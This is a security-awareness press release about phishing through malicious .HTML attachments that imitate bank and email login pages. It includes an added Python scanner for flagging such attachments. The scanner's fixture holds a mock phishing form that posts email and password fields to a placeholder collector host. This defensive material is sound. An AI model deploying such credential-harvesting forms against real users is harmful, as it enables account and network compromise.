KnowBe4 Alert: Cyber Criminals Switch To Malicious HTML Attachments


While ransomware attacks and new strains explode, organizations are reminded to be aware of new forms of social engineering that leave them open to attack

(Tampa Bay, FL) May 12, 2016 -- KnowBe4, the US’s most popular security awareness training and integrated phishing platform, warned customers this week of a new wave of social engineering tactics being introduced by cyber criminals. While ransomware continues to surge, a new form of social engineering attack is showing up that bypasses antivirus and secure email gateway products: malicious attachments in the HTML format, which banks use for secure messaging.

KnowBe4’s phish-alert button (a free plugin for Outlook, Office 365, Gmail and Notes) allows users to send suspicious phishing emails to IT or an internal incident response team with just one click. From these alerts, KnowBe4 analyzes which phishing attempts are making it through all the filters.

Over the past six to nine months, .DOC and .JS file attachments have dominated the news surrounding the rise in phishing attacks. The reasons are obvious and understandable: those two file types (usually packaged in .ZIP files) are commonly used to deliver extremely dangerous ransomware and banker trojans. However, employees should be trained to be wary of another file type that can now be a malicious attachment: .HTML files.

KnowBe4 CEO Stu Sjouwerman said, “Fresh KnowBe4 Lab analysis shows that although not nearly as prevalent as .JS and .DOC file attachments, .HTML attachments are now potentially dangerous enough that we alert our customers and organizations in general to adjust their email gateway filters to include .HTML attachments if possible, and train their users to be aware.”


  • Bank credential phishes are a familiar affair. The email body warns recipients of some urgent problem or issue requiring them to log in to their online bank accounts. The HTML pages used for these phishes more often resemble the targeted bank's home page than any actual HTML attachment used by a bank.
  • The bad guys also spoof popular online services, creating login pages that are nearly indistinguishable from the real thing. However, not all spoofed login forms are service or brand specific. KnowBe4 has seen an increasing number of brand-agnostic email login forms, delivered both as .HTML attachments and live online web pages. Although this .HTML attachment prominently features the Google brand, it advertises to victims that the form will accept credentials for any manner of email address or account. Users could easily use their work email logins, opening a door directly into their employers' corporate networks.
  • Bad guys often use the ruse of spoofing a secure document or message delivery service to trick users into opening a potentially malicious file or coughing up secure credentials. One example is the use of an Adobe ID login.
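The credential-form pattern in the list above is something a mail-processing hook can check for when .HTML attachments are added to gateway filtering. The following is an added example, not KnowBe4's code: `scan_message`, `FormFinder`, the sample message and its hosts are constructed for illustration, and the flagging rule (a password field or an absolute form action) is an assumption.

```python
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not from the page); all hosts are placeholders.
SAMPLE_EML = """\
From: notices@example.test
Subject: Secure message
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Open the attached secure message.
--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="SecureMessage.html"

<form action="https://collector.example.test/post" method="post">
<input type="text" name="email"><input type="password" name="pw"></form>
--b1--
"""

class FormFinder(HTMLParser):  # hypothetical helper: records forms and password inputs
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def scan_message(raw):
    """Return one finding per .html/.htm attachment in a raw RFC 5322 message."""
    findings = []
    msg = message_from_string(raw, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".html", ".htm")):
            continue
        # Decode the transfer encoding, then read as UTF-8 (declared charset is ignored here).
        body = part.get_payload(decode=True).decode("utf-8", "replace")
        finder = FormFinder()
        finder.feed(body)
        remote = [u for u in finder.actions if urlparse(u).scheme in ("http", "https")]
        findings.append({"filename": name, "password_field": finder.has_password,
                         "remote_actions": remote, "suspicious": finder.has_password or bool(remote)})
    return findings
```

A finding marked `suspicious` is a candidate for quarantine or manual review; HTML attachments that build their form with script will not be caught by this static check.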

Sjouwerman also noted, “Your best defense is to educate users. Employees who aren't security awareness trained often work with relatively simple models of how the online threat landscapes operate. While many users may recognize that .EXE and .PDF files are potentially dangerous or "bad," those same users will likely regard .HTML attachments as harmless and "good." Employees need to be educated about the wide variety of potentially malicious email attachments -- including .HTML attachments -- they may encounter in their inboxes.”

Effective training and frequent simulated phishing attacks are a vital step in managing the problem of social engineering and enabling employees to recognize and correctly respond to the actual threats they will encounter.

For more information visit: www.KnowBe4.com

About Stu Sjouwerman and KnowBe4

Stu Sjouwerman (pronounced “shower-man”) is the founder and CEO of KnowBe4, LLC, which hosts the world’s most popular integrated Security Awareness Training and Simulated Phishing platform. A data security expert with more than 30 years in the IT industry, Sjouwerman was the co-founder of Inc. 500 company Sunbelt Software, a multiple award-winning anti-malware software company that was acquired in 2010. Realizing that the human element of security was being seriously neglected, Sjouwerman decided to help organizations manage the problem of cybercrime social engineering tactics through new school security awareness training. More than 4000 organizations in a variety of industries, including highly-regulated fields such as healthcare, finance, energy, government and insurance, have mobilized their end users as a first line of defense using KnowBe4. Sjouwerman is the author of four books, with his latest being “Cyberheist: The Biggest Financial Threat Facing American Businesses.”
